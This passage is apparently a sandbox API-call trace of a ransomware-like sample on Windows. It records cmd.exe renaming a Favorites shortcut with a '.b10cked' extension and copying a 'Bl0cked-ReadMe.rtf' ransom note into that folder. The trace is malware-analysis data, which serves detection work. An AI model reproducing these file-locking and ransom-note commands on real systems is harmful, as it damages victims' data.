lpLCData="Sun") returned 4 [0213.782] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0213.782] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0213.783] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0213.784] GetConsoleTitleW (in: lpConsoleTitle=0x3108f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0213.784] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0213.784] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0213.784] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0213.784] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0213.785] _wcsicmp (_String1="move", _String2=")") returned 68 [0213.785] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0213.785] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0213.785] _wcsicmp (_String1="IF", _String2="move") returned -4 [0213.785] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0213.785] _wcsicmp (_String1="REM", _String2="move") returned 5 [0213.785] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0213.789] GetConsoleTitleW (in: lpConsoleTitle=0x1af330, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0214.049] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0214.050] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0214.050] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0214.050] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0214.050] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0214.050] _wcsicmp (_String1="move", _String2="CD") returned 10 [0214.050] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0214.050] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0214.050] _wcsicmp (_String1="move", _String2="REN") returned -5 [0214.050] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0214.050] _wcsicmp (_String1="move", _String2="SET") returned -6 [0214.050] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0214.050] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0214.050] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0214.050] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0214.050] _wcsicmp (_String1="move", _String2="MD") returned 11 [0214.050] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0214.050] _wcsicmp (_String1="move", _String2="RD") returned -5 [0214.050] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0214.050] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0214.050] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0214.050] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0214.050] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0214.050] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0214.050] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0214.050] _wcsicmp (_String1="move", _String2="VER") returned -9 [0214.050] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0214.050] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0214.050] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0214.050] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0214.050] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0214.050] _wcsicmp (_String1="move", _String2="START") returned -6 [0214.050] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0214.050] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0214.050] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0214.052] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0214.052] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0214.052] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1af0ec, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x1af0e4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1af0e4*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0214.052] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0214.052] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0214.052] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0214.052] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0214.052] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0214.052] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0214.053] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0214.053] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0214.053] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0214.053] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0214.053] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0214.053] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0214.053] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0214.053] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0214.053] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0214.053] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0214.053] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0214.053] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0214.053] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0214.053] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0214.053] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0214.053] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0214.053] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0214.053] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0214.053] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0214.053] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0214.053] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0214.053] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0214.053] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0214.053] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0214.053] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0214.053] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0214.054] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0214.054] _wcsicmp (_String1="MSNAUT~1.URL", _String2=".") returned 63 [0214.054] _wcsicmp (_String1="MSNAUT~1.URL", _String2="..") returned 63 [0214.054] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNAUT~1.URL" (normalized: "c:\\users\\default\\favori~1\\msnweb~1\\msnaut~1.url")) returned 0x20 [0214.054] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x321e68 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0214.054] SetErrorMode (uMode=0x0) returned 0x0 [0214.054] SetErrorMode (uMode=0x1) returned 0x0 [0214.054] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNAUT~1.URL", nBufferLength=0x104, lpBuffer=0x1aea74, lpFilePart=0x1aea5c | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNAUT~1.URL", lpFilePart=0x1aea5c*="MSNAUT~1.URL") returned 0x2f [0214.054] SetErrorMode (uMode=0x0) returned 0x1 [0214.055] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1" (normalized: "c:\\users\\default\\favori~1\\msnweb~1")) returned 0x10 [0214.055] _wcsicmp (_String1="MSNAUT~1.URL", _String2=".") returned 63 [0214.055] _wcsicmp (_String1="MSNAUT~1.URL", _String2="..") returned 63 [0214.055] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNAUT~1.URL" (normalized: "c:\\users\\default\\favori~1\\msnweb~1\\msnaut~1.url")) returned 0x20 [0214.055] SetErrorMode (uMode=0x0) returned 0x0 [0214.055] SetErrorMode (uMode=0x1) returned 0x0 [0214.055] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNAUT~1.URL", nBufferLength=0x104, lpBuffer=0x1aeef0, lpFilePart=0x1aec88 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNAUT~1.URL", lpFilePart=0x1aec88*="MSNAUT~1.URL") returned 0x2f [0214.055] SetErrorMode (uMode=0x0) returned 0x1 [0214.055] SetErrorMode (uMode=0x0) returned 0x0 [0214.055] SetErrorMode (uMode=0x1) returned 0x0 [0214.055] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Autos.url.b10cked", nBufferLength=0x104, lpBuffer=0x1af0f8, lpFilePart=0x1aec88 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Autos.url.b10cked", lpFilePart=0x1aec88*="MSN Autos.url.b10cked") returned 0x38 [0214.055] SetErrorMode (uMode=0x0) returned 0x1 [0214.055] SetLastError (dwErrCode=0x0) [0214.055] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Autos.url.b10cked" (normalized: "c:\\users\\default\\favori~1\\msnweb~1\\msn autos.url.b10cked")) returned 0xffffffff [0214.055] GetLastError () returned 0x2 [0214.055] FindFirstFileExW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNAUT~1.URL", fInfoLevelId=0x1, lpFindFileData=0x1ae604, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ae604) returned 0x310eb0 [0214.056] FindNextFileW (in: hFindFile=0x310eb0, lpFindFileData=0x1ae604 | out: lpFindFileData=0x1ae604) returned 0 [0214.056] GetLastError () returned 0x12 [0214.056] FindClose (in: hFindFile=0x310eb0 | out: hFindFile=0x310eb0) returned 1 [0214.057] FindFirstFileExW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNAUT~1.URL", fInfoLevelId=0x1, lpFindFileData=0x321c08, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x321c08) returned 0x310eb0 [0214.057] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Autos.url.b10cked", nBufferLength=0x104, lpBuffer=0x1ae89c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Autos.url.b10cked", lpFilePart=0x0) returned 0x38 [0214.057] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Autos.url", nBufferLength=0x104, lpBuffer=0x1ae89c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Autos.url", lpFilePart=0x0) returned 0x30 [0214.057] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Autos.url" (normalized: "c:\\users\\default\\favori~1\\msnweb~1\\msn autos.url")) returned 0x20 [0214.057] MoveFileExW (lpExistingFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Autos.url" (normalized: "c:\\users\\default\\favori~1\\msnweb~1\\msn autos.url"), lpNewFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Autos.url.b10cked" (normalized: "c:\\users\\default\\favori~1\\msnweb~1\\msn autos.url.b10cked"), dwFlags=0x3) returned 1 [0214.058] FindClose (in: hFindFile=0x310eb0 | out: hFindFile=0x310eb0) returned 1 [0214.058] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x1ae850 | out: _Buffer=" 1") returned 9 [0214.058] _get_osfhandle (_FileHandle=1) returned 0x7 [0214.058] GetFileType (hFile=0x7) returned 0x2 [0214.058] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0214.058] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ae7dc | out: lpMode=0x1ae7dc) returned 1 [0214.058] _get_osfhandle (_FileHandle=1) returned 0x7 [0214.058] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ae810 | out: lpConsoleScreenBufferInfo=0x1ae810) returned 1 [0214.059] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0214.059] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x1ae850 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0214.059] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x1ae834, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x1ae834*=0x1a) returned 1 [0214.059] _get_osfhandle (_FileHandle=1) returned 0x7 [0214.059] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0214.059] _get_osfhandle (_FileHandle=1) returned 0x7 [0214.059] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0214.060] _get_osfhandle (_FileHandle=0) returned 0x3 [0214.060] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0214.060] SetConsoleInputExeNameW () returned 0x1 [0214.060] GetConsoleOutputCP () returned 0x1b5 [0214.060] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0214.060] SetThreadUILanguage (LangId=0x0) returned 0x409 [0214.060] exit (_Code=0) Process: id = "529" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16840" os_pid = "0xa54" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 31439 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 31440 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 31441 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 31442 start_va = 0x1b0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 31443 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 31444 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 31445 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 31446 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 31447 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 31448 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 31531 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 31532 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 31533 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 31534 start_va = 0x3d0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 31535 start_va = 0x3e0000 end_va = 0x4dffff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 31536 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 31537 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 31538 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 31539 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 31540 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 31541 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 31542 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 31543 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 31544 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 31545 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 31546 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 31547 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 31548 start_va = 0x190000 end_va = 0x196fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 31549 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 31550 start_va = 0x2b0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 31551 start_va = 0x3c0000 end_va = 0x3c0fff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 31552 start_va = 0x4e0000 end_va = 0x10dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 31553 start_va = 0x10e0000 end_va = 0x1242fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000010e0000" filename = "" Region: id = 31554 start_va = 0x1250000 end_va = 0x1250fff entry_point = 0x0 region_type = private name = "private_0x0000000001250000" filename = "" Thread: id = 730 os_tid = 0xac0 [0213.815] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2afcf4 | out: lpSystemTimeAsFileTime=0x2afcf4*(dwLowDateTime=0xb440fe60, dwHighDateTime=0x1d440a9)) [0213.815] GetCurrentProcessId () returned 0xa54 [0213.815] GetCurrentThreadId () returned 0xac0 [0213.815] GetTickCount () returned 0x3be8d [0213.815] QueryPerformanceCounter (in: lpPerformanceCount=0x2afcec | out: lpPerformanceCount=0x2afcec*=27060410398) returned 1 [0213.816] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0213.816] __set_app_type (_Type=0x1) [0213.816] __p__fmode () returned 0x76b331f4 [0213.816] __p__commode () returned 0x76b331fc [0213.816] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0213.816] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0213.816] GetCurrentThreadId () returned 0xac0 [0213.816] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xac0) returned 0x38 [0213.816] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0213.816] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0213.816] SetThreadUILanguage (LangId=0x0) returned 0x409 [0213.817] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0213.817] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2afc84 | out: phkResult=0x2afc84*=0x0) returned 0x2 [0213.817] VirtualQuery (in: lpAddress=0x2afcbb, lpBuffer=0x2afc54, dwLength=0x1c | out: lpBuffer=0x2afc54*(BaseAddress=0x2af000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0213.817] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x2afc54, dwLength=0x1c | out: lpBuffer=0x2afc54*(BaseAddress=0x1b0000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0213.817] VirtualQuery (in: lpAddress=0x1b1000, lpBuffer=0x2afc54, dwLength=0x1c | out: lpBuffer=0x2afc54*(BaseAddress=0x1b1000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0213.817] VirtualQuery (in: lpAddress=0x1b3000, lpBuffer=0x2afc54, dwLength=0x1c | out: lpBuffer=0x2afc54*(BaseAddress=0x1b3000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0213.817] VirtualQuery (in: lpAddress=0x2b0000, lpBuffer=0x2afc54, dwLength=0x1c | out: lpBuffer=0x2afc54*(BaseAddress=0x2b0000, AllocationBase=0x2b0000, AllocationProtect=0x2, RegionSize=0x101000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0213.817] GetConsoleOutputCP () returned 0x1b5 [0213.817] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0213.817] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0213.817] _get_osfhandle (_FileHandle=1) returned 0x7 [0213.817] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0213.817] _get_osfhandle (_FileHandle=1) returned 0x7 [0213.818] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0213.818] _get_osfhandle (_FileHandle=1) returned 0x7 [0213.818] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0213.818] _get_osfhandle (_FileHandle=0) returned 0x3 [0213.818] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0213.818] _get_osfhandle (_FileHandle=0) returned 0x3 [0213.818] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0213.818] GetEnvironmentStringsW () returned 0x3f0188* [0213.819] FreeEnvironmentStringsW (penv=0x3f0188) returned 1 [0213.819] GetEnvironmentStringsW () returned 0x3f0188* [0213.819] FreeEnvironmentStringsW (penv=0x3f0188) returned 1 [0213.819] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2aebf4 | out: phkResult=0x2aebf4*=0x40) returned 0x0 [0213.819] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2aebfc, lpData=0x2aec00, lpcbData=0x2aebf8*=0x1000 | out: lpType=0x2aebfc*=0x0, lpData=0x2aec00*=0xb0, lpcbData=0x2aebf8*=0x1000) returned 0x2 [0213.819] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2aebfc, lpData=0x2aec00, lpcbData=0x2aebf8*=0x1000 | out: lpType=0x2aebfc*=0x4, lpData=0x2aec00*=0x1, lpcbData=0x2aebf8*=0x4) returned 0x0 [0213.819] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2aebfc, lpData=0x2aec00, lpcbData=0x2aebf8*=0x1000 | out: lpType=0x2aebfc*=0x0, lpData=0x2aec00*=0x1, lpcbData=0x2aebf8*=0x1000) returned 0x2 [0213.819] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2aebfc, lpData=0x2aec00, lpcbData=0x2aebf8*=0x1000 | out: lpType=0x2aebfc*=0x4, lpData=0x2aec00*=0x0, lpcbData=0x2aebf8*=0x4) returned 0x0 [0213.819] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2aebfc, lpData=0x2aec00, lpcbData=0x2aebf8*=0x1000 | out: lpType=0x2aebfc*=0x4, lpData=0x2aec00*=0x40, lpcbData=0x2aebf8*=0x4) returned 0x0 [0213.819] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2aebfc, lpData=0x2aec00, lpcbData=0x2aebf8*=0x1000 | out: lpType=0x2aebfc*=0x4, lpData=0x2aec00*=0x40, lpcbData=0x2aebf8*=0x4) returned 